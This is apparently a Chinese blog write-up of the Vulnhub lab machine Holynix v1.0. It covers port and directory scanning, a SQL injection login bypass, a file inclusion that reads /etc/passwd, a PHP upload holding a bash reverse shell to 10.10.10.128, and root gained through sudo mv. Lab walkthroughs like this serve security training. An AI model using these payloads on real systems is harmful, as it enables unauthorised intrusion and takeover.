Holynix v1.0
|
741
|
0

640 字
|
18 分钟

Holynix v1.0

主机发现

└─$ sudo nmap -sn 10.10.10.0/24
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:32 EDT
Nmap scan report for 10.10.10.1
Host is up (0.00018s latency).
MAC Address: 00:50:56:C0:00:08 (VMware)
Nmap scan report for 10.10.10.2
Host is up (0.00025s latency).
MAC Address: 00:50:56:E3:2D:B4 (VMware)
Nmap scan report for 10.10.10.134
Host is up (0.00063s latency).
MAC Address: 00:0C:29:BC:05:DE (VMware)
Nmap scan report for 10.10.10.254
Host is up (0.00015s latency).
MAC Address: 00:50:56:F4:2A:5D (VMware)
Nmap scan report for 10.10.10.128
Host is up.
Nmap done: 256 IP addresses (5 hosts up) scanned in 1.98 seconds

端口扫描

└─$ sudo nmap --min-rate 10000 -p- 10.10.10.134 -oA nmapscan/ports
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:32 EDT
Nmap scan report for 10.10.10.134
Host is up (0.0025s latency).
Not shown: 65534 closed tcp ports (reset)
PORT   STATE SERVICE
80/tcp open  http
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 5.39 seconds

TCP

└─$ sudo nmap -sT -sV -sC -O -p80 10.10.10.134 -oA nmapscan/detail
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:33 EDT
Nmap scan report for 10.10.10.134
Host is up (0.00095s latency).

PORT   STATE SERVICE VERSION
80/tcp open  http    Apache httpd 2.2.8 ((Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: Apache/2.2.8 (Ubuntu) PHP/5.2.4-2ubuntu5.12 with Suhosin-Patch
MAC Address: 00:0C:29:BC:05:DE (VMware)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose|router|specialized|WAP|phone|switch
Running (JUST GUESSING): Linux 2.6.X|4.X (96%), Linksys embedded (89%), Kronos embedded (89%), ipTIME embedded (88%), Suga embedded (88%), Nokia embedded (87%), Google Android 4.0.X (87%), Extreme Networks ExtremeXOS 15.X (86%)
OS CPE: cpe:/o:linux:linux_kernel:2.6 cpe:/o:linux:linux_kernel:4.4 cpe:/h:linksys:rv042 cpe:/h:iptime:pro_54g cpe:/o:linux:linux_kernel:2.6.28 cpe:/h:nokia:n900 cpe:/o:google:android:4.0.4 cpe:/o:extremenetworks:extremexos:15.3
Aggressive OS guesses: Linux 2.6.24 - 2.6.25 (96%), Linux 2.6.35 (92%), Linux 2.6.22 (SPARC) (91%), Linux 2.6.18 - 2.6.24 (90%), Linux 2.6.9 - 2.6.33 (89%), Linux 4.4 (89%), Linksys RV042 router (89%), Kronos InTouch timeclock (89%), Linux 2.6.18 - 2.6.32 (88%), ipTIME PRO 54G WAP (88%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 14.90 seconds

UDP

└─$ sudo nmap -sU -p80 10.10.10.134 -oA nmapscan/udp
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 09:33 EDT
Nmap scan report for 10.10.10.134
Host is up (0.00034s latency).

PORT   STATE  SERVICE
80/udp closed http
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 0.22 seconds

Nmap漏洞扫描

└─$ sudo nmap --script=vuln -p80 10.10.10.134 -oA nmapscan/vuln
Starting Nmap 7.94 ( https://nmap.org ) at 2023-07-24 10:00 EDT

PORT   STATE SERVICE
80/tcp open  http
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-trace: TRACE is enabled
| http-slowloris-check:
|   VULNERABLE:
|   Slowloris DOS attack
|     State: LIKELY VULNERABLE
|     IDs:  CVE:CVE-2007-6750
|       Slowloris tries to keep many connections to the target web server open and hold
|       them open as long as possible.  It accomplishes this by opening connections to
|       the target web server and sending a partial request. By doing so, it starves
|       the http server's resources causing Denial Of Service.
|
|     Disclosure date: 2009-09-17
|     References:
|       http://ha.ckers.org/slowloris/
|_      https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-6750
| http-csrf:
| Spidering limited to: maxdepth=3; maxpagecount=20; withinhost=10.10.10.134
|   Found the following possible CSRF vulnerabilities:
|
|     Path: http://10.10.10.134:80/?page=login.php
|     Form id:
|     Form action: /index.php?page=login.php
|
|     Path: http://10.10.10.134:80/index.php?page=login.php
|     Form id:
|_    Form action: /index.php?page=login.php
| http-sql-injection:
|   Possible sqli for queries:
|     http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/index.php?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|     http://10.10.10.134:80/index.php?page=login.php%27%20OR%20sqlspider
|_    http://10.10.10.134:80/?page=login.php%27%20OR%20sqlspider
|_http-vuln-cve2017-1001000: ERROR: Script execution failed (use -d to debug)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
| http-enum:
|   /login.php: Possible admin folder
|   /login/: Login page
|   /home/: Potentially interesting folder
|   /icons/: Potentially interesting folder w/ directory listing
|   /img/: Potentially interesting folder
|   /index/: Potentially interesting folder
|   /misc/: Potentially interesting folder
|   /transfer/: Potentially interesting folder
|_  /upload/: Potentially interesting folder
MAC Address: 00:0C:29:BC:05:DE (VMware)

Nmap done: 1 IP address (1 host up) scanned in 345.50 seconds

渗透思路

Web渗透

目录爆破

└─$ sudo gobuster dir -u http://10.10.10.134 --wordlist=/usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
===============================================================
Gobuster v3.5
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.10.134
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/seclists/Discovery/Web-Content/raft-large-directories.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.5
[+] Timeout:                 10s
===============================================================
2023/07/24 09:35:12 Starting gobuster in directory enumeration mode
===============================================================
/misc                 (Status: 301) [Size: 351] [--> http://10.10.10.134/misc/]
/img                  (Status: 301) [Size: 350] [--> http://10.10.10.134/img/]
/upload               (Status: 301) [Size: 353] [--> http://10.10.10.134/upload/]
/login                (Status: 200) [Size: 342]
/home                 (Status: 200) [Size: 109]
/index                (Status: 200) [Size: 776]
/header               (Status: 200) [Size: 604]
/footer               (Status: 200) [Size: 63]
/transfer             (Status: 200) [Size: 44]
/messageboard         (Status: 200) [Size: 249]
/server-status        (Status: 403) [Size: 333]
/calender             (Status: 200) [Size: 247]
/ssp                  (Status: 301) [Size: 350] [--> http://10.10.10.134/ssp/]
/index                (Status: 200) [Size: 776]
===============================================================
2023/07/24 09:35:24 Finished
===============================================================

手工测试是否有SQL注入,使用' or 1=1-- 万能密码进行登录

成功登录,发现一处文件包含漏洞,漏洞点参数text_file_name具体如下

POST /index.php?page=ssp.php HTTP/1.1
Host: 10.10.10.134
Content-Length: 45
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: http://10.10.10.134
Content-Type: application/x-www-form-urlencoded
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/114.0.5735.134 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.10.10.134/index.php?page=ssp.php
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: uid=1
Connection: close
text_file_name=%2Fetc%2Fpasswd&B=Display+File

获得passwd文件内容如下

root:x:0:0:root:/root:/bin/bash
daemon:x:1:1:daemon:/usr/sbin:/bin/sh
bin:x:2:2:bin:/bin:/bin/sh
sys:x:3:3:sys:/dev:/bin/sh
sync:x:4:65534:sync:/bin:/bin/sync
games:x:5:60:games:/usr/games:/bin/sh
man:x:6:12:man:/var/cache/man:/bin/sh
lp:x:7:7:lp:/var/spool/lpd:/bin/sh
mail:x:8:8:mail:/var/mail:/bin/sh
news:x:9:9:news:/var/spool/news:/bin/sh
uucp:x:10:10:uucp:/var/spool/uucp:/bin/sh
proxy:x:13:13:proxy:/bin:/bin/sh
www-data:x:33:33:www-data:/var/www:/bin/sh
backup:x:34:34:backup:/var/backups:/bin/sh
list:x:38:38:Mailing List Manager:/var/list:/bin/sh
irc:x:39:39:ircd:/var/run/ircd:/bin/sh
gnats:x:41:41:Gnats Bug-Reporting System (admin):/var/lib/gnats:/bin/sh
nobody:x:65534:65534:nobody:/nonexistent:/bin/sh
libuuid:x:100:101::/var/lib/libuuid:/bin/sh
dhcp:x:101:102::/nonexistent:/bin/false
syslog:x:102:103::/home/syslog:/bin/false
klog:x:103:104::/home/klog:/bin/false
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:114:MySQL Server,,,:/var/lib/mysql:/bin/false
alamo:x:1000:115::/home/alamo:/bin/bash
etenenbaum:x:1001:100::/home/etenenbaum:/bin/bash
gmckinnon:x:1002:100::/home/gmckinnon:/bin/bash
hreiser:x:1003:50::/home/hreiser:/bin/bash
jdraper:x:1004:100::/home/jdraper:/bin/bash
jjames:x:1005:50::/home/jjames:/bin/bash
jljohansen:x:1006:115::/home/jljohansen:/bin/bash
ltorvalds:x:1007:113::/home/ltorvalds:/bin/bash
kpoulsen:x:1008:100::/home/kpoulsen:/bin/bash
mrbutler:x:1009:50::/home/mrbutler:/bin/bash
rtmorris:x:1010:100::/home/rtmorris:/bin/bash

尝试包含shadow文件失败

/index.php?page=upload.php路径可上传文件

尝试上传一句话木马shell.php

<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.10.10.128/1234 0>&1'"); ?>

上传失败,提示该用户禁止上传文件至Home目录

利用SQL注入切换rtmorris登录

报错信息显示原始SQL查询语句如下

SELECT * FROM accounts WHERE username='' AND password=''

修改后的Payload如下

' or username='rtmorris' --

修改后的查询语句如下

SELECT * FROM accounts WHERE username='tester' AND password='' or username='rtmorris' -- '

接着重新上传shell.php,发现上传成功,但不知道传哪了,同时路径变换为

http://10.10.10.134/index.php?page=transfer.php

用刚刚的文件包含看看transfer.php的内容,具体如下

<?php
if ( $auth == 0 ) {
        echo "<center><h2>Content Restricted</h2></center>";
} else {
    if ( $upload == 1 )
    {
        $homedir = "/home/".$logged_in_user. "/";
        $uploaddir = "upload/";
        $target = $uploaddir . basename( $_FILES['uploaded']['name']) ;
        $uploaded_type = $_FILES['uploaded']['type'];
        $command=0;
        $ok=1;

        if ( $uploaded_type =="application/gzip" && $_POST['autoextract'] == 'true' ) {   $command = 1; }

        if ($ok==0)
        {
            echo "Sorry your file was not uploaded";
            echo "<a href='?index.php?page=upload.php' >Back to upload page</a>";
        } else {
                if(move_uploaded_file($_FILES['uploaded']['tmp_name'], $target))
            {
                echo "<h3>The file '" .$_FILES['uploaded']['name']. "' has been uploaded.</h3><br />";
                echo "The ownership of the uploaded file(s) have been changed accordingly.";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
                if ( $command == 1 )
                {
                    exec("sudo tar xzf " .$target. " -C " .$homedir);
                    exec("rm " .$target);
                } else {
                    exec("sudo mv " .$target. " " .$homedir . $_FILES['uploaded']['name']);
                }
                exec("/var/apache2/htdocs/update_own");
                } else {
                echo "Sorry, there was a problem uploading your file.<br />";
                echo "<br /><a href='?page=upload.php' >Back to upload page</a>";
            }
        }
    } else { echo "<br /><br /><h3>Home directory uploading disabled for user " .$logged_in_user. "</h3>"; }
}
?>

获得目录为~用户名,接着使用命令将文件使用tar压缩

tar czf shell.php.gz shell.php

再将shell.php.gz进行上传,尝试访问接受反弹的shell

curl http://10.10.10.134/~rtmorris/shell.php
└─$ sudo nc -lvnp 1234
listening on [any] 1234 ...
connect to [10.10.10.128] from (UNKNOWN) [10.10.10.134] 60802
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
 11:07:27 up  1:35,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM              LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: can't access tty; job control turned off
$ python -c "import pty;pty.spawn('/bin/bash')";
www-data@holynix:/$ whoami
whoami
www-data
www-data@holynix:/$ cat /etc/crontab
cat /etc/crontab
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.

SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin

# m h dom mon dow user  command
17 *    * * *   root    cd / && run-parts --report /etc/cron.hourly
25 6    * * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6    * * 7   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6    1 * *   root    test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#

www-data@holynix:/$ uname -a
uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
www-data@holynix:/$

www-data@holynix:/$ sudo -l
sudo -l
User www-data may run the following commands on this host:
    (root) NOPASSWD: /bin/chown
    (root) NOPASSWD: /bin/chgrp
    (root) NOPASSWD: /bin/tar
    (root) NOPASSWD: /bin/mv
www-data@holynix:/$

权限提升

sudo mv提权

www-data@holynix:/$ mv /bin/tar /bin/tar.old
mv /bin/tar /bin/tar.old
mv: cannot move `/bin/tar' to `/bin/tar.old': Permission denied
www-data@holynix:/$ sudo mv /bin/tar /bin/tar.old
sudo mv /bin/tar /bin/tar.old
www-data@holynix:/$ sudo mv /bin/su /bin/tar
sudo mv /bin/su /bin/tar
www-data@holynix:/$ sudo tar
sudo tar
root@holynix:/#

提权成功

root@holynix:/# whoami
whoami
root
root@holynix:/# ip a
ip a
1: lo: <LOOPBACK,UP,LOWER_UP> mtu 16436 qdisc noqueue
    link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
    inet 127.0.0.1/8 scope host lo
    inet6 ::1/128 scope host
       valid_lft forever preferred_lft forever
2: eth0: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc pfifo_fast qlen 1000
    link/ether 00:0c:29:bc:05:de brd ff:ff:ff:ff:ff:ff
    inet 10.10.10.134/24 brd 10.10.10.255 scope global eth0
    inet6 fe80::20c:29ff:febc:5de/64 scope link
       valid_lft forever preferred_lft forever
root@holynix:/# uname -a
uname -a
Linux holynix 2.6.24-26-server #1 SMP Tue Dec 1 19:19:20 UTC 2009 i686 GNU/Linux
root@holynix:/#
FileInclusionSQLInjectUploadfileVulnhubWeb
暂无评论

发送评论 编辑评论 



























































































|´・ω・)ノ
ヾ(≧∇≦*)ゝ
(☆ω☆)
(╯‵□′)╯︵┴─┴
 ̄﹃ ̄
(/ω\)
∠( ᐛ 」∠)_
(๑•̀ㅁ•́ฅ)
→_→
୧(๑•̀⌄•́๑)૭
٩(ˊᗜˋ*)و
(ノ°ο°)ノ
(´இ皿இ`)
⌇●﹏●⌇
(ฅ´ω`ฅ)
(╯°A°)╯︵○○○
φ( ̄∇ ̄o)
ヾ(´・ ・`。)ノ"
( ง ᵒ̌皿ᵒ̌)ง⁼³₌₃
(ó﹏ò。)
Σ(っ °Д °;)っ
( ,,´・ω・)ノ"(´っω・`。)
╮(╯▽╰)╭
o(*////▽////*)q
>﹏<
( ๑´•ω•) "(ㆆᴗㆆ)
😂
😀
😅
😊
🙂
🙃
😌
😍
😘
😜
😝
😏
😒
🙄
😳
😡
😔
😫
😱
😭
💩
👻
🙌
🖕
👍
👫
👬
👭
🌚
🌝
🙈
💊
😶
🙏
🍦
🍉
😣
Source: github.com/k4yt3x/flowerhd
	




颜文字
Emoji
小恐龙
花!
	


									














上一篇
下一篇